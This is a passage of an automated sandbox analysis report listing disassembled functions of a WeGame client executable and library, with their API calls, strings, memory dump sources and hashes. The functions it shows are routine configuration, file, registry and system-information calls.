                                                                • e:\dailybuild_dev\wegame_client\codes\common\inc\cfg_file.h, xrefs: 0045402B
                                                                • [gl]Get cfg failed. path:%s, xrefs: 0045404B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@H_prolog3$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_H_prolog3_catch_Logger@1@U?$less@V12@V?$basic_ptree@
                                                                • String ID: [gl]Get cfg failed. path:%s$e:\dailybuild_dev\wegame_client\codes\common\inc\cfg_file.h
                                                                • API String ID: 1555206004-1591787546
                                                                • Opcode ID: 28f5714ea3f8e257c529b5b8e965e669c3b8b513a0c18cde655975f1ecb6811f
                                                                • Instruction ID: 954c1160aca5fd1ce00b1aec04121a396aa14778c07685900a847669182918fb
                                                                • Opcode Fuzzy Hash: 28f5714ea3f8e257c529b5b8e965e669c3b8b513a0c18cde655975f1ecb6811f
                                                                • Instruction Fuzzy Hash: 63219231D00108ABDF15EFA5C851ADE7774AF14748F60815EF8527B282EB789E09CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD45F63 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD45F6D
                                                                • ?GetWeGameAppDataPathW@Sys_wrapper@common@ierd_tgp@@SA_NAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,6BFA11FC), ref: 6BD45FBE
                                                                  • Part of subcall function 6BDB2A44: __EH_prolog3_GS.LIBCMT ref: 6BDB2A4E
                                                                  • Part of subcall function 6BDB2A44: memset.VCRUNTIME140(?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A65
                                                                  • Part of subcall function 6BDB2A44: memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A77
                                                                  • Part of subcall function 6BDB2A44: SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BDB2A8E
                                                                  • Part of subcall function 6BDB2A44: ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6BDB2ACE
                                                                  • Part of subcall function 6BDB2A44: swprintf.LIBCMT ref: 6BDB2B29
                                                                  • Part of subcall function 6BDB2A44: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000), ref: 6BDB2B67
                                                                  • Part of subcall function 6BDB2A44: ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?), ref: 6BDB2B79
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(6BFA11FC), ref: 6BD45FE7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6BD4600B
                                                                • appdata_project_folder failed, xrefs: 6BD4601F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: PathSys_wrapper@common@ierd_tgp@@memset$?create_directory_ex@?exists@filesystem@ierd_tgp@@?get_client_version_type@overseas@ierd_tgp@@?get_log_instance@base@@DataFolderGameH_prolog3_H_prolog3_catch_Logger@1@U?$char_traits@_V?$allocator@_V?$basic_string@_Verror_code@std@@@Vpath@12@Vpath@filesystem@3@@W@2@@std@@@W@std@@swprintf
                                                                • String ID: appdata_project_folder failed$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp
                                                                • API String ID: 1782788727-3324992569
                                                                • Opcode ID: 64c426f2e22bc15cadf52ad0ba2529f0a00e5616faa9a862473627040bdf184e
                                                                • Instruction ID: 1576e5f1b1befbb1e063311c517b974fe5fa09b3d93f97c43c1083ab3d2f3dbe
                                                                • Opcode Fuzzy Hash: 64c426f2e22bc15cadf52ad0ba2529f0a00e5616faa9a862473627040bdf184e
                                                                • Instruction Fuzzy Hash: 5C21AE71905208DADB14CFB8C891BCCBBB06F04318F6080ADD645BF291DB7D9B09DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD571AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD571B5
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                • ?is_profile_on@common@ierd_tgp@@YA_NXZ.COMMON(00000040), ref: 6BD571CA
                                                                • ?enable_profile_on@common@ierd_tgp@@YAX_N@Z.COMMON(?), ref: 6BD57246
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,?,?,?,initial.profile.on,00000012,00000040), ref: 6BD57209
                                                                  • Part of subcall function 6BD4702B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                  • Part of subcall function 6BD4702B: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?enable_profile_on@common@ierd_tgp@@?get_cfg_by_path@common@ierd_tgp@@?is_profile_on@common@ierd_tgp@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3H_prolog3_H_prolog3_catch_U?$less@V12@V34@1@V?$basic_ptree@memmove
                                                                • String ID: initial.profile.on
                                                                • API String ID: 2365034594-3868740645
                                                                • Opcode ID: 0a67897ed0fdee7b608782a281cd17465900f3ba88a00f9d71ac72b259ee48e5
                                                                • Instruction ID: 3f81d7cd53416b3a20ae491d61d5f91879c9ce4d5abbbb74d4dc93be26062c06
                                                                • Opcode Fuzzy Hash: 0a67897ed0fdee7b608782a281cd17465900f3ba88a00f9d71ac72b259ee48e5
                                                                • Instruction Fuzzy Hash: 50119D71C01248AADF01DFF0C9427EDBBB06F10328F204169D5116A2C2DB7C5B4AEB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD25892 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2589C
                                                                • memset.VCRUNTIME140(?,00000000,00000104,00000120,6BD25A67,?,?,00000000,00000001), ref: 6BD258B5
                                                                • ?get_prefix@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 6BD258CC
                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6BD25910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_prefix@util_multi_instance@ierd_tgp@@CreateD@2@@std@@D@std@@H_prolog3_MutexU?$char_traits@V?$allocator@V?$basic_string@memset
                                                                • String ID: %s%s
                                                                • API String ID: 4200199740-3252725368
                                                                • Opcode ID: fabefe5b77905ffa3d00af887102f1815a5c4780284cd24e1e59455c4dc88215
                                                                • Instruction ID: c854a40fa7573afc8f1810d605c2cc9f73fa72e899916d047ce847a63a804a05
                                                                • Opcode Fuzzy Hash: fabefe5b77905ffa3d00af887102f1815a5c4780284cd24e1e59455c4dc88215
                                                                • Instruction Fuzzy Hash: D601D4B2800208AFDB18DF74DD81DDA737CEF15328F1004A9A6559B191E7749F448B72
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD8F960 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 6BD8F987
                                                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,00000004), ref: 6BD8F9A4
                                                                • RegCloseKey.KERNEL32(?), ref: 6BD8F9AF
                                                                Strings
                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 6BD8F97A
                                                                • ~MHz, xrefs: 6BD8F99C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                • API String ID: 3677997916-2226868861
                                                                • Opcode ID: aa85950b4d3fc2e2616453b677b87fa126b7d94720801b63dfa37d323b5646dc
                                                                • Instruction ID: 045155e864b90c7e9b83296483039ac1b6d3ca541f59abda7d2c114cc6a758ab
                                                                • Opcode Fuzzy Hash: aa85950b4d3fc2e2616453b677b87fa126b7d94720801b63dfa37d323b5646dc
                                                                • Instruction Fuzzy Hash: 5DF04F76D01208FBDF10AF95D949E9FBFBCEB85714F10806AEA01E3125D7349609DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDB2DA9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 6BDB2DC7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 6BDB2DCE
                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 6BDB2DE0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleInfoModuleNativeProcSystem
                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                • API String ID: 3469989633-192647395
                                                                • Opcode ID: a311ea9e1980a7b404ef5feb9822cd633cd1c917a39a6de6501c9415f1c507dd
                                                                • Instruction ID: 16ede194b168be27a08f4f7f1dcdecf43960d8ba6bf3e2380b622901b5509253
                                                                • Opcode Fuzzy Hash: a311ea9e1980a7b404ef5feb9822cd633cd1c917a39a6de6501c9415f1c507dd
                                                                • Instruction Fuzzy Hash: DBE0EC73F00204ABCE14B7AB8D089DF3BB8DB89764B500455E506BB040E67ADA8AD3F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043AF50 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B01A
                                                                • memset.VCRUNTIME140(00000010,00000001,00000001,00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B028
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000001,0000000F), ref: 0043B06B
                                                                • memmove.VCRUNTIME140(00000000,?,00000000,00000001,00000001,0000000F), ref: 0043B073
                                                                • memset.VCRUNTIME140(7FFFFFFF,00000001,00000001,00000000,?,00000000,00000001,00000001,0000000F), ref: 0043B07F
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmovememset$_invalid_parameter_noinfo_noreturnmalloc
                                                                • String ID:
                                                                • API String ID: 3042321802-0
                                                                • Opcode ID: 14007b52be7b924d1c8ec143cee0fc2f6b83e11c323f2da67bd97f56d23c199b
                                                                • Instruction ID: 40fe008a575036e968cc8bb14f2953c503ab92dc483c717cde0f4becbe2c97f8
                                                                • Opcode Fuzzy Hash: 14007b52be7b924d1c8ec143cee0fc2f6b83e11c323f2da67bd97f56d23c199b
                                                                • Instruction Fuzzy Hash: 894114B2A001049FCB05EF28CC805AEB7A6EF89350F10426EF915DB341DB34DD6187DA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD63DD1 Relevance: 7.6, APIs: 5, Instructions: 101fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD63DD8
                                                                • GetFileAttributesW.KERNEL32(?,00000024,6BD61BE2,00000000,00000000,?,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?), ref: 6BD63DF4
                                                                • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,6BD61BCA,00000000,00000000), ref: 6BD63E54
                                                                  • Part of subcall function 6BD62728: CreateFileW.KERNEL32(00000000,00000008,00000007,00000000,00000003,02200000,00000000,1F5A0D44,?,00000000,00000000,6BF84385,000000FF,?,6BD63E89,?), ref: 6BD62774
                                                                  • Part of subcall function 6BD62728: DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,?,00004000,?,00000000), ref: 6BD627A6
                                                                  • Part of subcall function 6BD62728: CloseHandle.KERNEL32(00000000,?,6BD63E89,?,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18,?), ref: 6BD627D4
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18,?,?,?,?), ref: 6BD63EA7
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18,?,?,?,?), ref: 6BD63EB6
                                                                  • Part of subcall function 6BD62D1E: __EH_prolog3_GS.LIBCMT ref: 6BD62D25
                                                                  • Part of subcall function 6BD62D1E: ?extension@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,0000001C,6BD63ED8,?,00000000,?,?,?,6BD61BCA,00000000,00000000,?,?,?,?,6C03BD18), ref: 6BD62D42
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateH_prolog3_$?extension@path@filesystem@ierd_tgp@@AttributesControlDeviceV123@
                                                                • String ID:
                                                                • API String ID: 3244417928-0
                                                                • Opcode ID: 7dcb15effb9d3fbb091d24ead9f845557c8ffb079a2e763b2958261d92fea563
                                                                • Instruction ID: 15e5b2b4392217cad26f97dbcc34abcdc389df2f85d3c9be8b60a4aa18c4c31e
                                                                • Opcode Fuzzy Hash: 7dcb15effb9d3fbb091d24ead9f845557c8ffb079a2e763b2958261d92fea563
                                                                • Instruction Fuzzy Hash: 4B319070914205EFDB24CF68DC46B9DB7B4EF05374F204219E865AB2D0E7389A05CB71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD85ECA Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InterlockedCompareExchange.KERNEL32(6C09F010,000000FF,00000000), ref: 6BD85EE0
                                                                • memmove.VCRUNTIME140(?,6C09F000,00000010,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85F28
                                                                  • Part of subcall function 6BD85F39: __EH_prolog3_GS.LIBCMT ref: 6BD85F43
                                                                  • Part of subcall function 6BD85F39: memset.VCRUNTIME140(?,00000000,00000006,00000358,6BD85EF7,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85F5C
                                                                • memmove.VCRUNTIME140(?,6C09F000,00000010,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85EFD
                                                                • InterlockedExchange.KERNEL32(6C09F010,00000001), ref: 6BD85F08
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExchangeInterlockedmemmove$CompareH_prolog3_memset
                                                                • String ID:
                                                                • API String ID: 3014269698-0
                                                                • Opcode ID: bf89c137e83d723edbeaa7434018ebc468af03960e692923146be2ec44fd6534
                                                                • Instruction ID: d34a4ddcf1db09643215fa20be1a5270e8ef226013c35945c38cb66c543dadb0
                                                                • Opcode Fuzzy Hash: bf89c137e83d723edbeaa7434018ebc468af03960e692923146be2ec44fd6534
                                                                • Instruction Fuzzy Hash: 15F05932794100B3E6202F259C0AF573E2DABC1B65F000421FA051E561DBA7D8A2E6A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00469DFB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00469E02
                                                                  • Part of subcall function 00459C0D: __EH_prolog3.LIBCMT ref: 00459C14
                                                                  • Part of subcall function 0046C858: __EH_prolog3_GS.LIBCMT ref: 0046C85F
                                                                Strings
                                                                • No such node, xrefs: 00469E40
                                                                • class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha, xrefs: 00469E6C
                                                                • e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 00469E67
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$H_prolog3
                                                                • String ID: No such node$class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha$e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp
                                                                • API String ID: 3952504126-2268865274
                                                                • Opcode ID: 3fdd627a91be0f17f2dce43afd9fd71986a91349f195d1cd6b97fcc2005e8d1c
                                                                • Instruction ID: 06a616a78d9fc9ad670e7f341ce03bfede6bbac0949cea2da8f5897e8d36133b
                                                                • Opcode Fuzzy Hash: 3fdd627a91be0f17f2dce43afd9fd71986a91349f195d1cd6b97fcc2005e8d1c
